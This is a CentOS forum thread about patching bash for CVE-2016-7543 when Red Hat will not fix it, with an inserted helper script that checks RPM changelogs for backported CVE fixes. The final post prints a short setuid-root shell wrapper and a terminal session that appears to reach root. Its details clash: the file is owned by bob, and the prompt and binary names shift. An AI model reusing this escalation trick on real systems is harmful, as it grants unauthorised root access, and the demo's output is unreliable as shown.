Maintain latest security fixes

s0ke
Posts: 11
Joined: 2015/02/13 18:55:50

Maintain latest security fixes

Postby s0ke » 2017/02/14 20:53:21

I'm looking for guidance really on what's the best practice to maintain latest security fixes in upstream packages on top of our base 6.8 packages.

So, for example, our security czar is saying we need to have bash version 4.4 or greater. Well, the CentOS 6 repos' latest version is 4.1.2-40. The Red Hat CVE page says CVE-2016-7543 will not be fixed: https://access.redhat.com/security/cve/cve-2016-7543. I realize we could build bash from source and add it to our system, but I really don't want to maintain that. I personally go with what Red Hat has in their CVE/RHSAs. Now, on the flip side of that, I see where they (security) are coming from. If they were able to present me with actual hard data that they exploited said CVE, then I may say OK, let's build bash from source and move on. However, this makes my life harder when it comes to maintenance.

Any pointers or is it pretty much just yum update and wait for fixes to trickle downstream? Or are there other possible avenues. Hopefully that makes sense.

Thanks
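The point the question turns on is that Red Hat and CentOS backport security fixes into the existing package version rather than rebasing to upstream, so the upstream version number alone ("4.4 or greater") does not tell you whether a given CVE is fixed; the RPM changelog does. The following is an added example, not code from the thread or from the CentOS project, that checks an RPM changelog for a CVE id. The changelog text, maintainer, dates and the id CVE-0000-0001 are constructed placeholders; on a real host you would feed it the output of rpm -q --changelog instead.

```shell
#!/bin/sh
# Added example (not from the thread): Red Hat/CentOS backport security fixes
# without bumping the upstream version, so a "4.1.2-40" bash can already carry
# a fix. The %changelog of the installed RPM is where backports are recorded.
# Real-host usage:  rpm -q --changelog bash | cve_in_changelog CVE-2016-7543

# cve_in_changelog CVE-ID : read changelog text on stdin, exit 0 if the id appears.
cve_in_changelog() {
    grep -q -i -- "$1"
}

# Constructed sample changelog (placeholder dates, maintainer and CVE id;
# these are not real bash changelog entries) so the check runs offline.
SAMPLE_CHANGELOG='* Mon Jan 02 2017 Example Maintainer <maint@example.invalid> - 4.1.2-41
- Backport upstream fix for CVE-0000-0001 (placeholder id)
* Tue Mar 01 2016 Example Maintainer <maint@example.invalid> - 4.1.2-40
- Rebuild for release'

# report_cve PKG CVE-ID [CHANGELOG-TEXT] : prints a verdict; returns 0 if the
# CVE is referenced, 1 if not, 2 if the package changelog cannot be read.
# Without a third argument it queries rpm for the installed package.
report_cve() {
    pkg=$1
    cve=$2
    if [ $# -ge 3 ]; then
        text=$3
    else
        text=$(rpm -q --changelog "$pkg" 2>/dev/null) || {
            echo "$pkg: not installed or rpm unavailable"
            return 2
        }
    fi
    if printf '%s\n' "$text" | cve_in_changelog "$cve"; then
        echo "$pkg: $cve referenced in changelog (backported fix present)"
        return 0
    fi
    echo "$pkg: $cve not referenced; confirm against the vendor advisory before treating it as fixed"
    return 1
}

# Demonstration on the constructed sample: the placeholder id is found,
# CVE-2016-7543 (which Red Hat lists as will-not-fix for bash 4.1) is not.
report_cve bash CVE-0000-0001 "$SAMPLE_CHANGELOG"
report_cve bash CVE-2016-7543 "$SAMPLE_CHANGELOG" || true
```

A "not referenced" result is a prompt to read the advisory, not proof of exposure: Red Hat sometimes records a fix under the RHSA number only, or rates the issue as not affecting the shipped build.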

Whoever
Posts: 964
Joined: 2013/09/06 03:12:10

Re: Maintain latest security fixes

Postby Whoever » 2017/02/16 02:39:06

Perhaps this is the most important information about that CVE:
http://www.securityfocus.com/bid/93183/exploit
Currently, we are not aware of any working exploits.

s0ke
Posts: 11
Joined: 2015/02/13 18:55:50

Re: Maintain latest security fixes

Postby s0ke » 2017/02/17 14:44:57

It's more of a means of privilege escalation.


[bob@box1 ~]$ gcc -xc - -oescu <<< 'int main() { setuid(0); system("/bin/sh"); }'
[bob@box1 ~]$ chmod 4755 ./escu
[bob@box1 ~]$ ls -l ./escu
-rwsr-xr-x. 1 bob bob 6543 Feb 14 16:50 ./escu
[box@box1 ~]$ ./esc
sh-4.1# whoami
root


The way I see it, though, it only works for users who already have sudo access. So if an account is compromised that has sudo, in my opinion it's pretty much game over at that point anyway. This is just an easy way to escalate privileges w/o the need to grab a hash or use some other password cracking method.